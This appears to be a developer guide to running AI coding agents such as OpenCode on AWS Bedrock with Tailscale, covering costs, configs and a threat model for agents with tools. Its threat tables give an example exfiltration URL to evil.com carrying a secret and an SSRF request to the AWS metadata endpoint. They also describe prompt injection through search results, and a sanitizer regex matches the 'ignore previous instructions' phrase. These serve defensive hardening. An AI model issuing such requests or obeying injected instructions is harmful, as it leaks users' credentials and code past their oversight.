| Local machine (Ollama) | Complete (air-gap possible) | $0 infra, requires beefy GPU |
Self-hosting a 480B model requires multiple A100/H100 GPUs — not practical for a solo dev.
Once the model is given tools that reach the internet, isolation breaks down:
Without tools: [Your Code] --> [Model] --> [Response] (isolated)
With tools: [Your Code] --> [Model] --> [Internet] --> [???] (NOT isolated)
The model itself cannot access the internet. But tool use / function calling allows it to instruct your application to do so on its behalf.
| Threat | Risk | Description |
|---|---|---|
| Query leaks your context | HIGH | Model sends search queries containing fragments of your code/data |
| Search results inject prompts | MEDIUM | Malicious websites embed prompt injection in HTML/snippets |
| Search provider logs your queries | HIGH | Google/Bing records what you're working on |
Example attack: You ask "fix this auth bug in my login handler" — the model searches for "fix JWT validation bypass in MyCompanyApp login endpoint" — now the search provider knows your app name and that you have an auth vulnerability.
| Threat | Risk | Description |
|---|---|---|
| Downloading malicious content | HIGH | Model fetches a URL serving malware or backdoored code |
| SSRF (Server-Side Request Forgery) | CRITICAL | Model requests http://169.254.169.254/latest/meta-data/ — leaks AWS credentials |
| Exfiltration via URL params | HIGH | Model crafts https://evil.com/log?data=YOUR_SECRET disguised as a download |
| Threat | Risk | Description |
|---|---|---|
| Data exfiltration | CRITICAL | Model uploads your source code to an external service |
| Credential theft | CRITICAL | Model uploads .env, SSH keys, or AWS credentials |
| Supply chain poisoning | MEDIUM | Model pushes compromised packages to registries |
+---------------------------------------------------+
| YOUR MACHINE (Tailscale) |
| |
| +---------+ +----------+ +--------------+ |
| | Your App |--->| Tool |--->| Proxy / |--+--> Internet
| | | | Router | | Allowlist | |
| +---------+ +----------+ +--------------+ |
| | |
| v VPC Endpoint (private) |
| +---------+ |
| | Bedrock | (no internet access) |
| +---------+ |
+---------------------------------------------------+
Never give the model raw HTTP/curl access. Define constrained tools:
| Instead of | Use |
|---|---|
| Raw URL fetch | Search tool querying a specific API (e.g., Brave Search) |
| Arbitrary file download | Tool that only downloads from allowlisted domains |
| File upload | Tool that only writes to local filesystem or specific S3 bucket |
ALLOWED_SEARCH_DOMAINS:
- docs.python.org
- stackoverflow.com
- developer.mozilla.org
- docs.aws.amazon.com
BLOCKED_URLS:
- 169.254.169.254/* # AWS metadata (SSRF)
- 127.0.0.1 / localhost # Local services
- *.internal # Internal DNS
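A tool wrapper might enforce the lists above along these lines. This is a sketch under stated assumptions: it only accepts HTTPS, rejects every literal IP address (which covers 169.254.169.254 and 127.0.0.1), and treats subdomains of allowlisted hosts as allowed. It does not defend against DNS rebinding or redirects, which need checks at connection time.

```python
import ipaddress
from urllib.parse import urlparse

ALLOWED_DOMAINS = {
    "docs.python.org",
    "stackoverflow.com",
    "developer.mozilla.org",
    "docs.aws.amazon.com",
}


def is_url_allowed(url: str) -> bool:
    """Return True only for HTTPS URLs whose host is on the allowlist."""
    parsed = urlparse(url)
    if parsed.scheme != "https":
        return False
    host = (parsed.hostname or "").lower().rstrip(".")
    if not host or host == "localhost" or host.endswith(".internal"):
        return False
    try:
        ipaddress.ip_address(host)
        return False  # literal IPs are never allowlisted (metadata, loopback, etc.)
    except ValueError:
        pass  # not an IP literal, continue with the domain check
    return any(host == d or host.endswith("." + d) for d in ALLOWED_DOMAINS)


for candidate in ("https://docs.python.org/3/library/json.html",
                  "http://169.254.169.254/latest/meta-data/",
                  "https://evil.com/log?data=YOUR_SECRET"):
    print(is_url_allowed(candidate), candidate)
```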
Before passing downloaded content back to the model:
- Strip HTML, keep only text
- Scan for prompt injection patterns
- Limit response size (prevent context poisoning)
- Never pass raw binary files to the model
- No outbound uploads unless to your own S3 bucket
- All "uploads" should be local file writes that you manually review
- Never let the model compose and send HTTP POST/PUT to external URLs
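The content-sanitization steps (strip HTML, scan for injection patterns, cap the size) could look roughly like this using only the standard library. The regexes and the 8,000-character cap are hypothetical placeholders; pattern matching catches only crude injections and is not a complete defense.

```python
import re
from html.parser import HTMLParser

MAX_CHARS = 8_000  # assumed cap to limit context poisoning

# Hypothetical, deliberately simple injection heuristics.
INJECTION_PATTERNS = [
    re.compile(r"ignore (?:all |any )?(?:previous|prior|above) instructions", re.IGNORECASE),
    re.compile(r"system prompt", re.IGNORECASE),
]


class _TextExtractor(HTMLParser):
    """Collects visible text and skips <script>/<style> contents."""

    def __init__(self) -> None:
        super().__init__()
        self.parts: list[str] = []
        self._skip_depth = 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip_depth += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip_depth:
            self._skip_depth -= 1

    def handle_data(self, data):
        if not self._skip_depth:
            self.parts.append(data)


def sanitize(raw_html: str, max_chars: int = MAX_CHARS) -> tuple[str, bool]:
    """Return (plain_text, suspicious) for fetched content."""
    parser = _TextExtractor()
    parser.feed(raw_html)
    parser.close()
    text = " ".join(" ".join(parser.parts).split())  # collapse whitespace
    suspicious = any(p.search(text) for p in INJECTION_PATTERNS)
    return text[:max_chars], suspicious


print(sanitize("<p>Hello <b>world</b></p><script>alert(1)</script>"))
```

Content flagged as suspicious is best dropped or shown to the user rather than passed to the model.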
| Component | Cost/mo | Purpose |
|---|---|---|
| Bedrock (model) | $10-60 | Inference only, no internet access |
| Lambda (tool executor) | $2-5 | Runs tools in sandboxed environment |
| S3 bucket (file storage) | $1 | Model reads/writes files here, not internet |
| Brave Search API | $0 | Free tier: 2,000 queries/mo, privacy-focused |
| API Gateway + WAF | $5-10 | Rate limiting, URL filtering |
| Tailscale | $0 | Secure access to your infrastructure |
| Total | $20-80 | |
Updated April 2026: The default NadirClaw lineup now uses Qwen3 Coder 30B (budget), Qwen3 Coder 480B (mid) on Bedrock, and Qwen 3.6 Plus (premium, 1M context) on OpenRouter (free during preview). When Qwen 3.6 Plus becomes available on Bedrock, switch the premium tier back to Bedrock to simplify the setup. See config/nadirclaw.env for the current routing config.
- Daily driver: Qwen3 Coder 480B — best quality/cost ratio at $10-22/mo (Bedrock)
- Budget option: Qwen3 Coder 30B — solid results at $7-12/mo (Bedrock)
- Premium / large context: Qwen 3.6 Plus — 1M context, free on OpenRouter preview
- Hard problems only: DeepSeek R1 — reserve for complex debugging/architecture (us-east-1)
- Enable VPC endpoint for Bedrock (+$7.50/mo) — keeps traffic off public internet
- Disable prompt/response logging in CloudWatch if code is sensitive
- Never put secrets, API keys, or credentials in prompts
- Tailscale ACLs — restrict which devices can reach your API
- Human-in-the-loop — require your approval for any action that sends data externally
- SSRF protection — Lambda runs in a VPC with no access to the metadata endpoint
- Review AWS Data Processing Addendum for your jurisdiction (GDPR, etc.)
The model decides what to do, but your code decides what's allowed. Never give the model raw network access.
OpenCode is an open-source AI coding agent (120K+ GitHub stars, 5M+ monthly developers) built in Go. It provides a rich TUI (Terminal User Interface) with vim-like editing, session persistence (SQLite), and multi-provider LLM support.
Available as: CLI/TUI tool, desktop app, and IDE extension (VS Code compatible).
GitHub: github.com/opencode-ai/opencode
| Advantage | Description |
|---|---|
| Free client | OpenCode is free — you only pay for API usage |
| Bedrock native support | First-class provider, uses standard AWS credential chain |
| Provider flexibility | 75+ providers — can mix Bedrock models with local Ollama models |
| Privacy | Can run fully local with Ollama for sensitive code, Bedrock for complex tasks |
| MCP support | Extensible via Model Context Protocol servers |
| Open source | Full audit trail of what the tool does with your code |
OpenCode authenticates with Bedrock via the standard AWS credential chain:
- Environment variables: AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, AWS_REGION
- Bearer token: AWS_BEARER_TOKEN_BEDROCK
- AWS profiles, shared credentials, IAM roles, Web Identity Tokens
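Before launching the client, a quick preflight check can report which of these credential sources is present in the environment. The sketch below is illustrative only: the order in which it checks the variables is an assumption and does not claim to mirror OpenCode's or the AWS SDK's actual precedence.

```python
import os
from typing import Mapping


def detect_bedrock_auth(env: Mapping[str, str] = os.environ) -> str:
    """Report which credential source is visible in the given environment."""
    if env.get("AWS_BEARER_TOKEN_BEDROCK"):
        return "bearer-token"
    if env.get("AWS_ACCESS_KEY_ID") and env.get("AWS_SECRET_ACCESS_KEY"):
        return "env-keys"
    if env.get("AWS_PROFILE"):
        return "profile"
    # Nothing explicit: shared credentials file, IAM role, or web identity token
    return "default-chain"


print("Credential source:", detect_bedrock_auth())
if not os.environ.get("AWS_REGION"):
    print("Note: AWS_REGION is not set")
```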
Prerequisite: Request model access in the Amazon Bedrock console first.
Project config (opencode.json in project root, safe to commit):
{
"provider": {
"bedrock": {
"models": {
"qwen3-coder-480b": {
"name": "Qwen3 Coder 480B A35B"
},
"deepseek-r1": {
"name": "DeepSeek R1"
}
}
}
}
}
For VPC endpoint (private connectivity), set a custom endpoint:
{
"provider": {
"bedrock": {
"options": {
"endpoint": "https://vpce-XXXX.bedrock-runtime.us-east-1.vpce.amazonaws.com"
}
}
}
}
API keys are stored separately at ~/.local/share/opencode/auth.json (or via /connect command).
OpenCode comes with tools that map directly to coding workflows:
| Tool | Description | Security Note |
|---|---|---|
| File read/write | Exact string replacement for precise edits | Reads any file in workspace |
| Bash/shell execution | Run terminal commands | Executes with your user privileges |
| Web search | Via Exa AI (no API key needed) | Queries may contain code context |
| Web fetch | Read web pages and docs | Subject to SSRF if model crafts URLs |
| File search / grep | Search across the codebase | Full workspace access |
| LSP integration | Language Server Protocol for code intelligence | Local only |
OpenCode implements an MCP client, enabling connection to external tool servers. This is how you would add Tailscale management, custom search APIs, or S3 file operations:
{
"mcp": {
"brave-search": {
"type": "stdio",
"command": "npx",
"args": ["-y", "@anthropic/mcp-brave-search"],
"env": {
"BRAVE_API_KEY": "${BRAVE_API_KEY}"
}
},
"s3-files": {
"type": "stdio",
"command": "npx",
"args": ["-y", "@aws/mcp-s3"],
"env": {
"AWS_REGION": "us-east-1"
}
}
}
}
| Feature | OpenCode | Claude Code | Cursor | Aider |
|---|---|---|---|---|
| Type | CLI/TUI + Desktop + IDE | CLI/Terminal | Full IDE | CLI/Terminal |
| Cost | Free (+ API costs) | $20/mo (Pro) or API | $20/mo (Pro) | Free (+ API costs) |
| Model flexibility | 75+ providers, local | Anthropic only | Multi-provider | Multi-provider |
| Open source | Yes | No | No | Yes |
| Bedrock support | Native | Yes (Claude models only) | No | Via LiteLLM |
| Can run fully local | Yes (Ollama) | No | No | Yes (Ollama) |
| MCP support | Yes | Yes | Limited | No |
| Git integration | Basic | Deep | Visual diffs | Deep (auto-commits) |
| Key strength | Provider flexibility, free | Best agentic features | Best GUI experience | Git-first workflow |
OpenCode's agent capabilities are powerful and unsandboxed:
- Reads every file in your workspace
- Executes arbitrary shell commands with your user privileges
- Sends file contents to whichever LLM provider you configured
- Writes/modifies files including configs that may contain secrets
The permission system is UX-only, not a security boundary. OpenCode's docs explicitly state it helps users stay aware of actions but does not provide security isolation.
| Threat | Risk | Mitigation |
|---|---|---|
| Code sent to AWS Bedrock | Accepted (contractual) | VPC endpoint, AWS DPA review |
| Code sent to third-party LLM | None if Bedrock-only | Don't configure other cloud providers |
| Shell command execution | HIGH | Review commands before approval |
| Secrets in workspace exposed to model | HIGH | Use .gitignore-aware tools, never store secrets in workspace |
| API keys stored in plaintext | MEDIUM | ~/.local/share/opencode/auth.json — protect file permissions |
| Web search leaking code context | MEDIUM | Use private search API (Brave), review queries |
| SSRF via web fetch | MEDIUM | Don't enable web fetch tool, or use allowlisted proxy |
- Run OpenCode in a container or VM for true isolation (Docker recommended)
- Use Bedrock as sole provider — no data leaves AWS infrastructure
- Disable web search/fetch tools if not needed — reduces attack surface
- Tailscale ACLs — restrict which machines can reach your Bedrock VPC endpoint
- Environment-based auth: use AWS_PROFILE or IAM roles instead of hardcoded keys
- Review before executing: always inspect shell commands the model suggests
- .opencodeignore: exclude sensitive files/directories from the model's reach
+----------------------------------------------------------+
| DEVELOPER MACHINE |
| |
| +------------+ +------------------+ |
| | OpenCode |---->| AWS SDK | |
| | (TUI/CLI) | | (credentials) | |
| +-----+------+ +--------+---------+ |
| | | |
| | MCP Servers | Tailscale Tunnel |
| v v |
| +-----------+ +---------------------+ |
| | Brave | | Tailscale Daemon | |
| | Search | | (encrypted mesh) | |
| | (local) | +----------+----------+ |
| +-----------+ | |
+----------------------------------------------------------+
|
Encrypted WireGuard Tunnel
|
+----------------------------------------------------------+
| AWS VPC (us-east-1) |
| |
| +-------------------+ +------------------+ |
| | VPC Endpoint |--->| Amazon Bedrock | |
| | (bedrock-runtime) | | (Qwen3/R1/etc.) | |
| +-------------------+ +------------------+ |
| |
| +-------------------+ +------------------+ |
| | S3 Bucket | | CloudWatch | |
| | (file storage) | | (logging, opt.) | |
| +-------------------+ +------------------+ |
| |
| +-------------------+ |
| | Tailscale Subnet | |
| | Router (t3.micro) | |
| +-------------------+ |
+----------------------------------------------------------+
Data flow:
- You type a coding request in OpenCode's TUI
- OpenCode sends it via AWS SDK to Bedrock through the Tailscale tunnel
- Traffic enters the VPC via the Tailscale subnet router
- Hits the VPC endpoint for Bedrock — never touches the public internet
- Response returns through the same encrypted path
- If tools are used (search, file ops), they execute locally or via MCP servers on your machine
| Component | Monthly Cost (EUR incl. VAT) |
|---|---|
| OpenCode | €0 (open source) |
| Bedrock inference (Qwen3 Coder 480B, medium use) | €25.75 |
| Tailscale Personal | €0 |
| EC2 t3.micro (subnet router) | €10.49 (or €0 if using own machine) |
| VPC Endpoint | €9.28 (optional but recommended) |
| S3 (file storage) | €1.20 |
| Brave Search API | €0 (free tier) |
| Total (minimal) | ~€27/mo |
| Total (recommended) | ~€47/mo |
With multi-model strategy (Qwen3 480B primary + Qwen3 30B for quick tasks): ~€32-40/mo.
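The two totals in the cost table are simple sums: the minimal setup counts only inference and S3, while the recommended setup adds the EC2 subnet router and the VPC endpoint. A short sketch with the table's figures (the `required` flag is an illustrative label, not a term from the table):

```python
# component -> (monthly cost in EUR incl. VAT, required for the minimal setup)
COMPONENTS = {
    "Bedrock inference (Qwen3 Coder 480B, medium use)": (25.75, True),
    "S3 (file storage)": (1.20, True),
    "EC2 t3.micro (subnet router)": (10.49, False),
    "VPC Endpoint": (9.28, False),
}

minimal = sum(cost for cost, required in COMPONENTS.values() if required)
recommended = sum(cost for cost, _ in COMPONENTS.values())

print(f"Minimal:     ~EUR {minimal:.0f}/mo")
print(f"Recommended: ~EUR {recommended:.0f}/mo")
```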
Compared to Claude Code Pro (~€22/mo incl. VAT) or Cursor Pro (~€22/mo incl. VAT), this setup costs slightly more but offers full model flexibility, open-source transparency, data residency in EU, and complete infrastructure control.